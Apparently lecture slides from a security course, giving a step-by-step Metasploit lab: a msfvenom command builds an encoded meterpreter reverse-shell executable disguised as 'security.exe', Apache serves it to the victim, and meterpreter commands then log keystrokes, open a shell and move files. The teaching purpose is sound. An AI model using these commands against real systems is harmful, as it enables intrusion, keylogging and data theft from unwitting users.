Exploit using Metasploit

Shell Binding

Number of ways
that you can bind Types of shells
your shell to a port

Bind Shell and Reverse Shell

Bind shell
• A bind shell is the kind that opens up a new service on the victim machine and
requires the attacker to connect to it in order to get a session

• Take cmd.exe and bind it to a local port, and anyone connecting to this port will be
presented with a command prompt belonging to that computer. This is known as a
BIND SHELL.

• To establish a connection, target needs to bind his cmd.exe process to a TCP

port on his machine and inform listener what port to connect to.
Bind Shell
• Bind shell is a type of shell in which the attacking machine opens up a
communication port on the victim machine
Reverse Shell
A reverse shell is the exact opposite:

• It requires the attacker to set up a listener first on his box, the target machine
acts as a client connecting to that listener, and

• then finally the attacker receives the shell.

Reverse Shell
• A reverse shell is a type of shell in which the target machine communicates
back to the attacking machine.
• The attacking machine has a listener port on which it receives connection
When to use a reverse shell?

If you find yourself in one of the following scenarios, then you should consider
using a reverse shell:
• The target machine is behind a different private network.
• The target machine's firewall blocks incoming connection attempts
• Your payload is unable to bind to the port it wants due to whatever reason.
• You simply can't decide what to choose.
Start services of postgresql
• PostgreSQL (pronounced "post-gress-Q-L")
• is an open source relational database management system ( DBMS ) developed by a worldwide
team of volunteers.

Before start exploiting- start service of postgresql

• Service postgresql start

8
MSFVENOM

34
Exploiting using Msfvenom
• Msfvenom is a combination of Msfpayload and Msfencode, putting both of these
tools into a single Framework instance.

• Note: msfvenom has replaced both msfpayload and msfencode as of June 8th,
2015.

• The advantages of msfvenom are:

• Creates payload
• One single tool
• Standardized command line options
• Increased speed
Exploiting using Msfvenom
Msfvenom has a wide range of options available ( -h for help)
MSFvenom Command Line Usage
• Msfvenom
Example
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
Meterpreter
• Meterpreter: it is an advanced payload

• enhance the post exploitation

• Typically a Meterpreter payload is multistage, where a minimal amount of code is

sent as part of the exploit, and then more is uploaded after code execution has
been accomplished.

• Communication from attacker to victim is completely encrypted.

Meterpreter

39
Meterpreter

• Metasploit most popular payload is Meterpreter, which enables you to do all sort
of stuff on target system.

• For e.g.,
• You can upload/download files from the system
• Take screenshots
• Collect password hashes
• Keyboard to fully control the computer
Meterpreter
• It has huge options to ease our post exploitation.
• We can gain full control of victim machine

• It can do a variety of tasks:

• Monitoring keystrokes
• Downloading files from target
• Uploading files to target, etc
Exploiting windows 7

• Exploit/multi/handler
• This module provides all of the features of the Metasploit payload system on different
platforms and architectures.
Exploiting windows 7 System using Reverse Shell

43
Exploiting Window 7
1. Open 1st terminal, type
msfconsole

2. Open 2nd terminal, type

service postgresql start
• After prompt appears on 2nd line, close this terminal

44
Exploiting Window 7
3. Go to 1st terminal, type
• use exploit/multi/handler

• set PAYLOAD windows/meterpreter/reverse_tcp

45
Exploiting Window 7
4. Type
• show options
• If LHOST or LPORT are not set these values. LHOST is the IP of kali machine.

46
Exploiting Window 7
5. set LHOST IP_OF_KALI
• Set lhost 192.168.137.134

47
Exploiting Window 7
6. Open a new terminal, type
msfvenom –h

48
Exploiting Window 7
6. Msfvenom commands required to generate payload

-p payload
-a architecture
-i iterations
-f format
--platform operating system

49
Exploiting Window 7
7. Now create a payload in form of exe

msfvenom –p windows/meterpreter/reverse_tcp LHOST =192.168.137.134 --platform win –a

x86 –e x86/shikata_ga_nai –I 8 –f exe > security.exe
-p windows/meterpreter/reverse_tcp
-e x86/shikata_ga_nai --> encoder that I use for this tutorial

50
Exploiting Window 7
7. Payload has been created on Desktop
security.exe

51
Exploiting Window 7
8. Now, copy the security.exe (payload) into windows PC with the help of pendrive or
transfer over http through apache or python server

Transfer through http

To serve a file up over Apache, just simply copy it to /var/www/html and enable the
Apache service. Apache is installed by default in Kali:

Cp security.exe /var/www/html

52
Exploiting Window 7
8b. Downloading the file.exe in windows

If you have desktop access, simply browse to http://YOUR-KALI-IP/ and use the
browser to download the file:

http://192.168.137.134/security.exe

53
Exploiting Window 7
8c. See the file in windows default download folder

54
Exploiting Window 7
9. Go to 1st terminal, type
Exploit

10. Go to windows system, double click the exe

11. This will open meterpreter on kali
Meterpreter

55
 Obtained Meterpreter
Now, Access Data of windows machine
Breach its security

56
Exploiting Window 7: Run command to access data

Keystrokes
1. keyscan_start
• Start the key scanner on victim’s machine. Open a notepad/word file and write
something into it
2. keyscan_dump
• Will print the logged keys onscreen
3. keyscan_stop
• Stop the key scanner on victim’s machine

57
Exploiting Window 7: Run command to access data

4. sysinfo
• Print the system information.

58
Exploiting Window 7: Run command to access data

5. pwd
• It will show present working directory

6. ls
• List all the contents

59
Exploiting Window 7: Run command to access data

7. Change path
• Cd C:\\

8. Local directory
• lpwd

60
Exploiting Window 7: Run command to access data

9. mkdir filename
• Create folder on victim’s machine
• Mkdir mehak
• ls

10. rmdir filename

• Remove folder from victim’s machine
• Rmdir mehak

61
Exploiting Window 7: Run command to access data

11. getuid
• To view current user

12. shell
• Open shell of windows PC on kali, run command ipconfig onto it. It will show all the details
• Enter exit to come to meterpreter prompt.

62
Exploiting Window 7: Run command to access data

13. Create a txt file sample.txt. write something into it and on kali run command
• cat Mehak.txt
• this will display all contents of that file. So, don’t write sensitive information in txt files.
• check with ls

63
Exploiting Window 7: Run command to access data

14. download sample.txt

• Will download the file on kali

15. upload sample.txt E:/

• Will upload file in window’s E drive

64
In class task
• Open already created file on desktop and change the content (integrity)
• Change the root directory to c: drive
• https://www.exploit-db.com/docs/english/18229-white-paper--post-exploitation-usin
g-meterpreter.pdf
• Important

• Reference: https://www.youtube.com/watch?v=RGJcaUL-9aw

65